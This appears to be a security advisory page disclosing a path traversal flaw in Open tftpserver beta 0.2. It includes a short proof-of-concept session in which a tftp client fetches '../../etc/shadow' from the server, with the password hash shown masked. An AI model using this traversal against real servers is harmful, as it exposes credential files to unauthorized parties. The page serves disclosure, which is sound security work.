Open tftpserver path traversal vulnerability

2018.10.02
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Title: Open tftpserver path traversal vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2006-03-24 Download Site: http://sourceforge.net/projects/tftp-server/ Vendor: achaldhir Vendor Notified: 2006-03-24 Vendor Contact: http://sourceforge.net/u/achaldhir/profile/ Advisory: http://www.vapid.dhs.org/advisories/tftpserver_dot_dot_vulnerability.html Description: MultiThreaded TFTP Server Open Source Freeware Windows/Unix for PXEBOOT, firmware load, support tsize, blksize, timeout Server Port Ranges, Block Number Rollover for Large Files. Runs as Service/daemon. Single Port version also available. Vulnerability: tftpserver beta 0.2 is vulnerable to the ../ bug because it does not sanitize user input. Export: JSON TEXT XML Exploit Code: root@pangea:/home/done/tftpserver# tftp 192.168.0.26 tftp> get ../../etc/shadow Received 652 bytes in 0.0 seconds tftp> quit root@debian:/home/done/tftpserver# head shadow root:$1XXXXXXXXXXXXXXXXXXX:13046:0:99999:7:::

References:

http://www.vapidlabs.com/advisory.php?v=46


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top